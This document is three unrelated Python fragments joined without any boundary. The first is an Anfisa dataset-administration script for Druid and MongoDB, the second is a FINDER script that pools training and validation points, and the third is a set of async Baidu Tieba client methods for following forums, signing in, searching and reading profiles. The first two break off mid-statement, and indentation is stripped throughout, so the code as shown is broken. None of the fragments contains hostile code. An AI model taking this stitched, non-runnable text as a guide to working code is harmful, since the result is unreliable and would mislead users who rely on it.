if name.lower().startswith("xl_"):
print("Improper WS name:", name, file = sys.stderr)
print("(Should not have prefix XL_)", file = sys.stderr)
assert False
elif kind == "xl":
if not name.lower().startswith("xl_"):
print("Improper XL-dataset name:", name, file = sys.stderr)
print("(Should have prefix XL_ or xl_)", file = sys.stderr)
assert False
else:
print("Wrong dataset kind:", kind)
assert False
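# Example of the naming rule (hypothetical names): checkDSName("xl_Demo", "xl")
# passes, while checkDSName("xl_Demo", "ws") aborts because workspace (ws)
# names must not carry the XL_ prefix.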
#===============================================
def createDataSet(app_config, ds_entry, force_drop, druid_adm,
report_lines, no_druid_push = False):
readySolutions()
if not ds_entry.getSource():
print("Improper creation datset", ds_entry.getName(), ": no source")
sys.exit()
vault_dir = app_config["data-vault"]
if force_drop:
dropDataSet(app_config, ds_entry, druid_adm, True)
if not os.path.isdir(vault_dir):
os.mkdir(vault_dir)
print("Create (empty) vault directory:", vault_dir, file = sys.stderr)
checkDSName(ds_entry.getName(), ds_entry.getDSKind())
ds_dir = os.path.abspath(vault_dir + "/" + ds_entry.getName())
if os.path.exists(ds_dir):
print("Dataset exists:", ds_dir, file = sys.stderr)
assert False
os.mkdir(ds_dir)
mongo_conn = MongoConnector(app_config["mongo-db"],
app_config.get("mongo-host"), app_config.get("mongo-port"))
createDS(ds_dir, mongo_conn, druid_adm,
ds_entry.getName(), ds_entry.getSource(), ds_entry.getDSKind(),
ds_entry.getInv(), report_lines, no_druid_push)
mongo_conn.close()
#===============================================
def pushDruid(app_config, ds_entry, druid_adm):
vault_dir = app_config["data-vault"]
if not os.path.isdir(vault_dir):
print("No vault directory:", vault_dir, file = sys.stderr)
assert False
if ds_entry.getDSKind() != "xl":
print("Druid dataset %s has unexpected kind %s" %
(ds_entry.getName(), ds_entry.getDSKind()),
file = sys.stderr)
sys.exit()
checkDSName(ds_entry.getName(), "xl")
druid_datasets = druid_adm.listDatasets()
if ds_entry.getName() in druid_datasets:
druid_adm.dropDataset(ds_entry.getName())
ds_dir = os.path.abspath(vault_dir + "/" + ds_entry.getName())
is_ok = pushDruidDataset(ds_dir, druid_adm, ds_entry.getName())
if is_ok:
print("Druid dataset %s pushed" % ds_entry.getName())
else:
print("Process failed")
#===============================================
def _dropDruidDataset(druid_adm, ds_name, calm_mode = False):
if calm_mode:
druid_datasets = druid_adm.listDatasets()
else:
druid_datasets = [ds_name]
if ds_name in druid_datasets:
druid_adm.dropDataset(ds_name)
elif not calm_mode:
print("No dataset in Druid to drop:", ds_name)
#===============================================
def dropDataSet(app_config, ds_entry, druid_adm, calm_mode):
assert ds_entry.getDSKind() in ("ws", "xl"), (
f"Missing ds kind: {ds_entry.getDSKind()}")
vault_dir = app_config["data-vault"]
ds_dir = os.path.abspath(vault_dir + "/" + ds_entry.getName())
if ds_entry.getDSKind() == "xl":
_dropDruidDataset(druid_adm, ds_entry.getName(), calm_mode)
if not os.path.exists(ds_dir):
if not calm_mode:
print("No dataset to drop:", ds_dir)
return
shutil.rmtree(ds_dir)
print("Dataset droped:", ds_dir)
#===============================================
def pushDoc(app_config, ds_entry):
vault_dir = app_config["data-vault"]
ds_dir = os.path.abspath(vault_dir + "/" + ds_entry.getName())
with open(ds_dir + "/dsinfo.json",
"r", encoding = "utf-8") as inp:
ds_info = json.loads(inp.read())
ds_doc_dir = ds_dir + "/doc"
ds_info["doc"] = prepareDocDir(ds_doc_dir, ds_entry.getInv(), reset = True)
mongo_conn = MongoConnector(app_config["mongo-db"],
app_config.get("mongo-host"), app_config.get("mongo-port"))
mongo_agent = mongo_conn.getDSAgent(ds_info["name"], ds_info["kind"])
with open(ds_dir + "/dsinfo.json", "w", encoding = "utf-8") as outp:
print(json.dumps(ds_info, sort_keys = True, indent = 4),
file = outp)
with open(ds_doc_dir + "/info.html", "w", encoding = "utf-8") as outp:
reportDS(outp, ds_info, mongo_agent)
mongo_conn.close()
print("Re-doc complete:", ds_dir)
#===============================================
def prepareFavorStorage(app_config):
portion_size, portion_fetch = app_config["favor-portions"]
return FavorStorageAgent(app_config["favor-url"],
portion_size, portion_fetch)
#===============================================
def initFavor(app_config, druid_adm, report_lines):
readySolutions()
vault_dir = app_config["data-vault"]
if not os.path.isdir(vault_dir):
os.mkdir(vault_dir)
print("Create (empty) vault directory:", vault_dir, file = sys.stderr)
ds_dir = os.path.abspath(vault_dir + "/xl_FAVOR")
if os.path.exists(ds_dir):
print("Dataset exists:", ds_dir, file = sys.stderr)
assert False
os.mkdir(ds_dir)
mongo_conn = MongoConnector(app_config["mongo-db"],
app_config.get("mongo-host"), app_config.get("mongo-port"))
createDS(ds_dir, mongo_conn, druid_adm,
"xl_FAVOR", None, "xl", report_lines = report_lines,
favor_storage = prepareFavorStorage(app_config))
mongo_conn.close()
#===============================================
def dropFavor(app_config, druid_adm, report_lines):
vault_dir = app_config["data-vault"]
ds_dir = os.path.abspath(vault_dir + "/xl_FAVOR")
if not os.path.exists(ds_dir):
print("No dataset to drop:", ds_dir)
return
shutil.rmtree(ds_dir)
print("Dataset droped:", ds_dir)
#===============================================
def portionFavor(app_config, druid_adm, portion_no, report_lines,
inside_mode = False):
favor_storage = prepareFavorStorage(app_config)
if not inside_mode:
print("Favor portions:", favor_storage.getPortionCount())
print("Push portion", portion_no)
vault_dir = app_config["data-vault"]
ds_dir = os.path.abspath(vault_dir + "/xl_FAVOR")
portionFavorDruidPush(ds_dir, druid_adm, favor_storage, portion_no)
print("Done portion", portion_no)
#===============================================
def ftuneFavor(app_config, druid_adm, report_lines):
vault_dir = app_config["data-vault"]
ds_name = "xl_FAVOR"
ds_dir = os.path.abspath(vault_dir + "/" + ds_name)
with open(ds_dir + "/dsinfo.json",
"r", encoding = "utf-8") as inp:
ds_info = json.loads(inp.read())
ds_info["total"] = druid_adm.mineTotal(ds_name)
for funit_entry in ds_info["flt_schema"]:
if funit_entry["kind"] == "enum":
variants = druid_adm.mineEnumVariants(
ds_name, funit_entry["name"])
print("Unit update: %s %d -> %d" % (funit_entry["name"],
len(funit_entry["variants"]), len(variants)))
funit_entry["variants"] = variants
with open(ds_dir + "/~dsinfo.json", "w", encoding = "utf-8") as outp:
print(json.dumps(ds_info, sort_keys = True, indent = 4),
file = outp)
os.rename(ds_dir + "/dsinfo.json", ds_dir + "/dsinfo.json~")
os.rename(ds_dir + "/~dsinfo.json", ds_dir + "/dsinfo.json")
print("Filter variants tuning done")
#===============================================
def _favorBatch(app_config, druid_adm, batch_dir, report_lines):
assert os.path.isdir(batch_dir), (
"Bad batch directory: " + batch_dir)
if os.path.exists(batch_dir + "/stop"):
print("STOPPED")
with open(batch_dir + "/log", "at") as outp:
print("%s: STOPED" % str(datetime.now()), file = outp)
return False
    assert os.path.exists(batch_dir + "/loaded.txt"), (
        "No file: " + batch_dir + "/loaded.txt")
loaded_idxs = set()
with open(batch_dir + "/loaded.txt", "rt") as inp:
for line_idx, line in enumerate(inp):
idx_str = line.strip()
assert idx_str.isdigit(), (
"loaded.txt at line %d: bad line" % (line_idx + 1))
idx = int(idx_str)
assert idx not in loaded_idxs, (
"loaded.txt at line %d: duplicated idx %d"
% (line_idx + 1, idx))
loaded_idxs.add(idx)
favor_storage = prepareFavorStorage(app_config)
p_count = favor_storage.getPortionCount()
next_portion = None
for idx in range(p_count - 1):
if idx not in loaded_idxs:
next_portion = idx
break
if next_portion is None:
print("MISSION COMPLETE (check last portion", p_count - 1)
with open(batch_dir + "/log", "at") as outp:
print("%s: COMPLETE" % str(datetime.now()), file = outp)
return False
with open(batch_dir + "/log", "at") as outp:
print("%s: Push portion %d" % (str(datetime.now()), next_portion),
file = outp)
portionFavor(app_config, druid_adm, next_portion, report_lines, True)
loaded_idxs.add(next_portion)
with open(batch_dir + "/~loaded.txt", "wt") as outp:
for idx in sorted(loaded_idxs):
print(idx, file = outp)
os.rename(batch_dir + "/loaded.txt", batch_dir + "/loaded.txt~")
os.rename(batch_dir + "/~loaded.txt", batch_dir + "/loaded.txt")
with open(batch_dir + "/log", "at") as outp:
print("%s: Done portion %d" % (str(datetime.now()), next_portion),
file = outp)
return True
#===============================================
def favorBatch(app_config, druid_adm, batch_dir, report_lines):
while _favorBatch(app_config, druid_adm, batch_dir, report_lines):
pass
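# The batch-directory layout assumed by _favorBatch()/favorBatch(), as inferred
# from the code above:
#   loaded.txt - one completed portion index per line, e.g. "0", "1", "2"
#   stop       - create this (empty) file to request a graceful stop
#   log        - timestamped progress lines appended by this script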
#===============================================
if __name__ == '__main__':
try:
sys.stderr = codecs.getwriter('utf8')(sys.stderr.detach())
sys.stdout = codecs.getwriter('utf8')(sys.stdout.detach())
except Exception:
pass
logging.root.setLevel(logging.INFO)
#========================================
import forome_tools
forome_tools.compatible((0, 1, 7))
#========================================
if sys.version_info < (3, 7):
from backports.datetime_fromisoformat import MonkeyPatch
MonkeyPatch.patch_fromisoformat()
#========================================
parser = ArgumentParser()
parser.add_argument("-d", "--dir",
help = "Storage directory control file")
parser.add_argument("-c", "--config",
help = "Anfisa configuration file, used only if --dir is unset, "
"default = anfisa.json")
parser.add_argument("-m", "--mode",
help = "Mode: create/drop/druid-push/doc-push/register/favor")
parser.add_argument("-k", "--kind", default = "ws",
help = "Kind of dataset: ws/xl, default = ws, "
"actual if --dir is unset")
parser.add_argument("-s", "--source", help="Annotated json, "
"actual if --dir is unset and mode = create")
parser.add_argument("-i", "--inv", help="Annotation inventory")
parser.add_argument("-f", "--force", action = "store_true",
help = "Force removal, actual if mode = create")
parser.add_argument("-C", "--nocoord", action = "store_true",
help = "Druid: no use coordinator")
parser.add_argument("--reportlines", type = int, default = 100,
help = "Portion for report lines, default = 100")
parser.add_argument("--delay", type = int, default = 0,
help = "Delay between work with multiple datasets, in seconds")
parser.add_argument("--nodruidpush", action = "store_true",
help = "No push into Druid, if mode = create")
parser.add_argument("names", nargs = "+", help = "Dataset name(s)")
args = parser.parse_args()
if args.mode == "register":
if (not args.dir or (not args.source and not args.inv)
or (args.source and args.inv)):
print("Improper arguments: mode register requires "
"--dir and (--source or --inv)")
sys.exit()
if len(args.names) != 1:
print("Only one dataset can be registered")
sys.exit(1)
dir_config = loadCommentedJSon(args.dir)
new_descr = {"kind": args.kind}
if args.source:
new_descr["a-json"] = args.source
else:
new_descr["inv"] = args.inv
dir_config["datasets"][args.names[0]] = new_descr
tmp_name = '~' + args.dir + '.tmp'
with open(tmp_name, "w", encoding = "utf-8") as outp:
outp.write(json.dumps(dir_config,
indent = 4, sort_keys = True, ensure_ascii = False))
os.rename(args.dir, args.dir + '~')
os.rename(tmp_name, args.dir)
print("Directory file", args.dir, "updated")
sys.exit()
if args.mode == "favor":
app_config = loadJSonConfig(args.config,
home_base_file = __file__, home_base_level = 1)
        druid_adm = DruidAdmin(app_config,
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
2.0_Pool_Trn_and_Val_Sets.py (from repo NoldAndreas/FINDER)

Accepts files created by 1.0_Data_Preparation and pools their points into
sets for training and validating new models.

@author: dave
'''
import os
import pandas as pd
from natsort import natsorted
import numpy as np
import pickle
from random import shuffle
import gc
import time
import json
proc_wd = os.path.dirname(os.path.abspath(__file__))
if os.getcwd() != proc_wd:
os.chdir(proc_wd)
print('Changed working directory to ' + proc_wd)
import FuncEtc as fn_etc
# ========================================================================
# About the training data
# ========================================================================
total_features = 1 # how many input features are we tracking,
# e.g. 1=distances, 2 = x,y coords, 3 = x,y,z coords,
total_labels = 2 # how many classification labels can we apply?
# e.g. 2=clustered/notclustered
# a default list for two labels:
default_label_names = ['Non-clustered', 'Clustered']
## a default list for three labels:
#default_label_names = ['Non-clustered', 'Clustered (round)', 'Clustered (fibre)']
feature_type = 'dists' # Either 'dists' or 'coords' to train on the distance values
# or the xy(z) coordinates.
# if 'coords' then you want to check that total_features is
# 2 or 3 for 2D or 3D images.
# ========================================================================
# Harvesting points from images
# ========================================================================
# from each input image, how many points of each class will be added to the pool?
points_per_label = 2000 # This many points (of each label) will be taken per image.
# If this many points (of a label) are not available then
# as many as are available will be taken.
# If no points (of a label) are available then no points
# will be taken to the pool, for that image.
#
# ... OR ...
#
use_all_points = True # if this is True then all points (of all labels) will
# be taken from each image. Useful if you have limited
# amount of training data or your labels are not evenly
# found within your source images.
# ========================================================================
# Total size of points-pools
# ========================================================================
# Overall number of points to use for training, validation, and testing datasets
total_training_count = 500000 # default 500000
total_validation_count = 100000 # default 100000
total_testing_count = 100000 # default 100000
# ========================================================================
# Composition of each pool
# ========================================================================
# Each pool of points will have a mixture of the available labels.
even_label_ratios = True # If True each label will be equally represented.
# If False then you must specify your own
# custom mixture of labels, below.
# Customised mixture of the labels within the training datasets.
# These three lines will be *ignored* if you are using even_label_ratios=True
# - Ensure there is an entry for each label!
# - Ensure the sum of all entries = 1.0!
# Two labels - custom mix of labels (if not using even_label_ratios, above)
training_label_fraction = [0.65, 0.35]
validation_label_fraction = [0.45, 0.55]
testing_label_fraction = [0.1, 0.9]
## Three labels - custom mix of labels (if not using even_label_ratios, above)
#training_label_fraction = [0.5, 0.35, 0.15]
#validation_label_fraction = [0.25, 0.5, 0.25]
#testing_label_fraction = [0.1, 0.1, 0.8]
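# Worked example for the custom split above: with total_training_count = 500000
# and training_label_fraction = [0.65, 0.35], the training pool would contain
# 325000 points of label 0 and 175000 points of label 1 (assuming the pooling
# stage simply multiplies the pool size by each label's fraction).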
# ========================================================================
# End of user-editable variables
# ========================================================================
if __name__ == '__main__':
# assuming you just ran the first stage, we can recycle the output folder from
# that stage as the input for this stage.
default_preplog = ''
default_input_path = os.getcwd()
if 's1_prep_outputpath' in locals():
# output exists from previous 1_DataPreparation script
default_input_path = s1_prep_outputpath
inputpath_train = fn_etc.askforinput(
message = 'Folder with distance measurements from ' +
'Stage 1 (.MemMap and .json etc)',
errormessage = 'The folder you provided does not exist',
defaultval = default_input_path,
isvalid = lambda v : os.path.isdir(v))
if os.path.exists(os.path.join(inputpath_train, 'PrepLog.txt')):
default_preplog = os.path.join(inputpath_train, 'PrepLog.txt')
print('') #blank line
fn_etc.info_msg('Found PrepLog.txt in the input folder')
PrepLogMessage = 'Confirm the path to PrepLog.txt file'
else:
PrepLogMessage = 'Enter the path to PrepLog.txt file'
input_PrepLog = fn_etc.askforinput(
message = PrepLogMessage,
errormessage = 'The file you provided does not exist',
defaultval = default_preplog,
isvalid = lambda v : os.path.isfile(v))
del PrepLogMessage
if os.path.isfile(input_PrepLog):
PrepLog_imported = pd.read_csv(input_PrepLog, delimiter='\t')
fn_etc.info_msg('Loaded PrepLog file from:')
fn_etc.info_msg(input_PrepLog)
# Clean any stray header lines that might have come in after restarting some processing
if PrepLog_imported.FileID.dtype != 'int64':
PrepLog_imported = PrepLog_imported[~PrepLog_imported.FileID.str.contains('FileID')]
PrepLog_imported = PrepLog_imported.apply(pd.to_numeric) #convert to numeric (rather than object)
PrepLog_imported = PrepLog_imported.reset_index(drop=True) # re-index to ignore the missing row(s)
else:
fn_etc.err_msg('Cannot find PrepLog.txt in the specified location')
raise ValueError('Cannot find PrepLog.txt! ' +
'has it moved since you gave its location?')
s2_trnvaltest_outputpath = fn_etc.askforinput(
message = 'Location of the output folder (will be created if it doesn\'t exist)',
errormessage= 'The dataset must be named',
defaultval= os.path.abspath(os.path.join(inputpath_train, '..', '2_training_pool')),
isvalid = lambda v : len(v) > 0 and not v.isspace())
# Confirm the human-readable labels to use in plots and messages.
label_names = [] # will hold the human-readable names for all our labels
label_counters = [] # will hold the counts for each label
for label in range(total_labels):
try:
suggested_label_name = default_label_names[label]
except:
suggested_label_name = 'Type ' + str(label)
label_name = fn_etc.askforinput(
message = 'Human-readable name for points with Label ' + str(label) + '',
errormessage = 'The label must have a name! The name must also have at least one readable character in it.',
defaultval = suggested_label_name,
isvalid = lambda v : len(v) > 0 and not v.isspace())
label_names.append(str(label_name))
label_counters.append(0)
## Either calculate the label ratios or check that the custom ratios are good.
if even_label_ratios:
label_split = 1/total_labels
training_label_fraction = []
validation_label_fraction = []
testing_label_fraction = []
for label in range(total_labels):
training_label_fraction.append(label_split)
validation_label_fraction.append(label_split)
testing_label_fraction.append(label_split)
else:
# customized split of the labels detected!
# Check that enough custom-splits have been supplied
        if len(training_label_fraction) != total_labels:
            raise ValueError('You have given ' + str(total_labels) + ' labels but only supplied ' + str(len(training_label_fraction)) + ' entries for training_label_fraction!')
        if len(validation_label_fraction) != total_labels:
            raise ValueError('You have given ' + str(total_labels) + ' labels but only supplied ' + str(len(validation_label_fraction)) + ' entries for validation_label_fraction!')
        if len(testing_label_fraction) != total_labels:
            raise ValueError('You have given ' + str(total_labels) + ' labels but only supplied ' + str(len(testing_label_fraction)) + ' entries for testing_label_fraction!')
        # Check that each arrangement adds up to 1
if sum(training_label_fraction) != 1:
raise ValueError('The values for \'training_label_fraction\' must sum up to 1.0')
if sum(validation_label_fraction) != 1:
raise ValueError('The values for \'validation_label_fraction\' must sum up to 1.0')
if sum(testing_label_fraction) != 1:
raise ValueError('The values for \'testing_label_fraction\' must sum up to 1.0')
## get a list of the files to process from the given folder
# mmap array for the distances to the Nth NNs.
dist_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'Dists.MemMap' in i])
# mmap array for the original xy input data
data_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'Data.MemMap' in i])
# mmap array for the 'target_vectors' classifier for training data
target_vectors_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'TargetVectors.MemMap' in i])
# mmap array for the 'target_binary' classifier for training data
target_binary_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'TargetBinary.MemMap' in i])
# mmap array for the 'target_labels' classifier for training data
target_labels_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and 'TargetLabels.MemMap' in i])
# json file describing the metadata for each input file (image size, NN etc)
json_files_train = natsorted([i for i in os.listdir(inputpath_train) if os.path.isfile(os.path.join(inputpath_train, i)) and '.json' in i])
total_files_train = np.shape(dist_files_train)[0]
if total_files_train > 0:
if total_files_train != np.shape(PrepLog_imported)[0]:
ErrorMessage = 'Input folder contains ' + str(total_files_train) + ' files but your PrepLog describes ' + str(np.shape(PrepLog_imported)[0]) + ' files!'
fn_etc.err_msg('Files in the input folder don\'t align with those in the PrepLog.txt file.')
raise ValueError(ErrorMessage)
else:
if total_files_train == np.shape(data_files_train)[0] == np.shape(json_files_train)[0] == np.shape(target_vectors_files_train)[0] == np.shape(target_binary_files_train)[0]:
fn_etc.info_msg('Found ' + str(total_files_train) + ' datasets to work with...')
else:
if np.shape(target_labels_files_train)[0] == np.shape(target_vectors_files_train)[0] == np.shape(target_binary_files_train)[0] == 0:
ErrorMessage = 'There appears to be no useable files for model training. Cannot find TargetLabels.MemMap files!'
fn_etc.err_msg('Missing required files for training!')
else:
                    ErrorMessage = 'For training and validation, each dataset requires a corresponding set of four'
payload = [
('BDUSS', self.sessions.BDUSS),
('portrait', user.portrait),
('tbs', await self.get_tbs()),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/c/user/unfollow", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', loads=JSON_DECODER.decode, content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
except Exception as err:
LOG.warning(f"Failed to unfollow user {user.log_name}. reason:{err}")
return False
LOG.info(f"Successfully unfollowed user {user.log_name}")
return True
async def get_self_forum_list(self, pn: int = 1) -> Tuple[List[Tuple[str, int]], bool]:
"""
        Get page pn of the current account's followed-forum list

        Args:
            pn (int, optional): Page number. Defaults to 1.

        Returns:
            tuple[list[tuple[str, int]], bool]: list[(forum name, forum id)], whether there is a next page
"""
try:
res = await self.sessions.web.get("https://tieba.baidu.com/mg/o/getForumHome", params={'pn': pn, 'rn': 200})
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['errno']):
raise ValueError(res_json['errmsg'])
forums: list[dict] = res_json['data']['like_forum']['list']
res_list = [(forum['forum_name'], int(forum['forum_id'])) for forum in forums]
has_more = len(forums) == 200
except Exception as err:
LOG.warning(f"Failed to get self_forum_list. reason:{err}")
res_list = []
has_more = False
return res_list, has_more
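    # Usage sketch (hypothetical client instance), paging until has_more is False:
    #     pn = 1
    #     while True:
    #         forums, has_more = await client.get_self_forum_list(pn)
    #         for fname, fid in forums:
    #             print(fname, fid)
    #         if not has_more:
    #             break
    #         pn += 1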
async def like_forum(self, fname_or_fid: Union[str, int]) -> bool:
"""
        Follow a forum

        Args:
            fname_or_fid (str | int): Forum name or fid of the forum to follow; fid takes precedence

        Returns:
            bool: Whether the operation succeeded
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
try:
payload = [
('BDUSS', self.sessions.BDUSS),
('fid', fid),
('tbs', await self.get_tbs()),
]
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/c/forum/like", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
if int(res_json['error']['errno']):
raise ValueError(res_json['error']['errmsg'])
except Exception as err:
LOG.warning(f"Failed to like forum {fname_or_fid}. reason:{err}")
return False
LOG.info(f"Successfully liked forum {fname_or_fid}")
return True
async def unlike_forum(self, fname_or_fid: Union[str, int]) -> bool:
"""
        Unfollow a forum

        Args:
            fname_or_fid (str | int): Forum name or fid of the forum to unfollow; fid takes precedence

        Returns:
            bool: Whether the operation succeeded
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
try:
payload = [
('BDUSS', self.sessions.BDUSS),
('fid', fid),
('tbs', await self.get_tbs()),
]
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/c/forum/unfavolike", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
except Exception as err:
LOG.warning(f"Failed to unlike forum {fname_or_fid}. reason:{err}")
return False
LOG.info(f"Successfully unliked forum {fname_or_fid}")
return True
async def sign_forum(self, fname_or_fid: Union[str, int]) -> bool:
"""
        Sign in to a forum (daily check-in)

        Args:
            fname_or_fid (str | int): Forum name or fid of the forum to sign in to; forum name takes precedence

        Returns:
            bool: True means no further sign-in attempt is needed; False means the attempt failed and should be retried
"""
fname = fname_or_fid if isinstance(fname_or_fid, str) else await self.get_fname(fname_or_fid)
        error_code = 0  # pre-initialize so the except branch below cannot hit an unbound name
        try:
payload = [
('BDUSS', self.sessions.BDUSS),
('_client_version', self.sessions.latest_version),
('kw', fname),
('tbs', await self.get_tbs()),
]
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/c/forum/sign", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
error_code = int(res_json['error_code'])
if error_code:
raise ValueError(res_json['error_msg'])
if int(res_json['user_info']['sign_bonus_point']) == 0:
raise ValueError("sign_bonus_point is 0")
except Exception as err:
LOG.warning(f"Failed to sign forum {fname}. reason:{err}")
            if error_code in [160002, 340006]:
                # already signed in today, or the forum is blocked
return True
return False
LOG.info(f"Successfully signed forum {fname}")
return True
async def get_homepage(self, _id: Union[str, int]) -> Tuple[UserInfo, List[Thread]]:
"""
        Get a user's profile-page info

        Args:
            _id (str | int): id of the target user, one of user_id/user_name/portrait; portrait takes precedence

        Returns:
            tuple[UserInfo, list[Thread]]: user info, list[thread info]
"""
if not BasicUserInfo.is_portrait(_id):
user = await self.get_basic_user_info(_id)
else:
user = BasicUserInfo(_id)
payload = [
            ('_client_type', 2),  # removing this field makes post_list empty
            ('_client_version', self.sessions.latest_version),  # removing this field makes post_list and dynamic_list empty
            ('friend_uid_portrait', user.portrait),
            ('need_post_count', 1),  # removing this field makes the post/reply counts unavailable
            # ('uid', user_id),  # this field can be used to check forums followed in common
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/u/user/profile", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', loads=JSON_DECODER.decode, content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
            if 'user' not in res_json:
raise ValueError("invalid params")
except Exception as err:
LOG.warning(f"Failed to get profile of {user.portrait}. reason:{err}")
return UserInfo(), []
user = UserInfo(_raw_data=ParseDict(res_json['user'], User_pb2.User(), ignore_unknown_fields=True))
def _pack_thread_dict(thread_dict: dict) -> NewThread:
thread = NewThread(ParseDict(thread_dict, NewThreadInfo_pb2.NewThreadInfo(), ignore_unknown_fields=True))
thread._user = user
return thread
threads = [_pack_thread_dict(thread_dict) for thread_dict in res_json['post_list']]
return user, threads
async def search_post(
self,
fname_or_fid: Union[str, int],
query: str,
pn: int = 1,
rn: int = 30,
query_type: int = 0,
only_thread: bool = False,
) -> Searches:
"""
        Tieba post search

        Args:
            fname_or_fid (str | int): Forum name or fid of the forum to query; forum name takes precedence
            query (str): Query text
            pn (int, optional): Page number. Defaults to 1.
            rn (int, optional): Number of entries requested. Defaults to 30.
            query_type (int, optional): Query mode. 0 = all results (the app does not seem to offer this mode), 1 = app reverse-chronological order, 2 = app relevance ranking. Defaults to 0.
            only_thread (bool, optional): Whether to search threads only. Defaults to False.

        Returns:
            Searches: List of search results
"""
fname = fname_or_fid if isinstance(fname_or_fid, str) else await self.get_fname(fname_or_fid)
payload = [
('_client_version', self.sessions.latest_version),
('kw', fname),
('only_thread', int(only_thread)),
('pn', pn),
('rn', rn),
('sm', query_type),
('word', query),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/s/searchpost", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', loads=JSON_DECODER.decode, content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
searches = Searches(res_json)
except Exception as err:
LOG.warning(f"Failed to search {query} in {fname}. reason:{err}")
searches = Searches()
return searches
async def get_forum_list(self, _id: Union[str, int]) -> List[Tuple[str, int, int, int]]:
"""
        Get a user's followed-forum list

        Args:
            _id (str | int): id of the target user, one of user_id/user_name/portrait; user_id takes precedence

        Returns:
            list[tuple[str, int, int, int]]: list[(forum name, forum id, user level, experience points)]
"""
if not BasicUserInfo.is_user_id(_id):
user = await self.get_basic_user_info(_id)
else:
user = BasicUserInfo(_id)
payload = [
('BDUSS', self.sessions.BDUSS),
('friend_uid', user.user_id),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/f/forum/like", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
forums: list[dict] = res_json.get('forum_list', [])
res_list = [
(forum['name'], int(forum['id']), int(forum['level_id']), int(forum['cur_score'])) for forum in forums
]
except Exception as err:
LOG.warning(f"Failed to get forum_list of {user.user_id}. reason:{err}")
res_list = []
return res_list
async def get_forum_detail(self, fname_or_fid: Union[str, int]) -> Tuple[str, int, int]:
"""
        Get forum info via forum_id

        Args:
            fname_or_fid (str | int): Target forum name or fid; fid takes precedence

        Returns:
            tuple[str, int, int]: forum name, follower count, thread count
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
payload = [
('_client_version', self.sessions.latest_version),
('forum_id', fid),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/f/forum/getforumdetail", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
fname = res_json['forum_info']['forum_name']
member_num = int(res_json['forum_info']['member_count'])
thread_num = int(res_json['forum_info']['thread_count'])
except Exception as err:
LOG.warning(f"Failed to get forum_detail of {fname_or_fid}. reason:{err}")
fname = ''
member_num = 0
thread_num = 0
return fname, member_num, thread_num
async def get_bawu_dict(self, fname_or_fid: Union[str, int]) -> Dict[str, List[BasicUserInfo]]:
"""
        Get moderator (bawu) info

        Args:
            fname_or_fid (str | int): Target forum name or fid; fid takes precedence

        Returns:
            dict[str, list[BasicUserInfo]]: {moderator role type: list[moderator basic user info]}
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
common_proto = CommonReq_pb2.CommonReq()
common_proto._client_version = self.sessions.latest_version
data_proto = GetBawuInfoReqIdl_pb2.GetBawuInfoReqIdl.DataReq()
data_proto.common.CopyFrom(common_proto)
data_proto.forum_id = fid
req_proto = GetBawuInfoReqIdl_pb2.GetBawuInfoReqIdl()
req_proto.data.CopyFrom(data_proto)
try:
res = await self.sessions.app_proto.post(
"http://c.tieba.baidu.com/c/f/forum/getBawuInfo?cmd=301007",
data=self.sessions._pack_proto_bytes(req_proto.SerializeToString()),
)
res_proto = GetBawuInfoResIdl_pb2.GetBawuInfoResIdl()
res_proto.ParseFromString(await res.content.read())
if int(res_proto.error.errorno):
raise ValueError(res_proto.error.errmsg)
roledes_protos = res_proto.data.bawu_team_info.bawu_team_list
bawu_dict = {
roledes_proto.role_name: [
BasicUserInfo(_raw_data=roleinfo_proto) for roleinfo_proto in roledes_proto.role_info
]
for roledes_proto in roledes_protos
}
except Exception as err:
LOG.warning(f"Failed to get bawu_dict. reason: {err}")
bawu_dict = {}
return bawu_dict
async def get_tab_map(self, fname_or_fid: Union[str, int]) -> Dict[str, int]:
"""
        Get the mapping from tab name to tab id

        Args:
            fname_or_fid (str | int): Target forum name or fid; forum name takes precedence

        Returns:
            dict[str, int]: {tab name: tab id}
"""
fname = fname_or_fid if isinstance(fname_or_fid, str) else await self.get_fname(fname_or_fid)
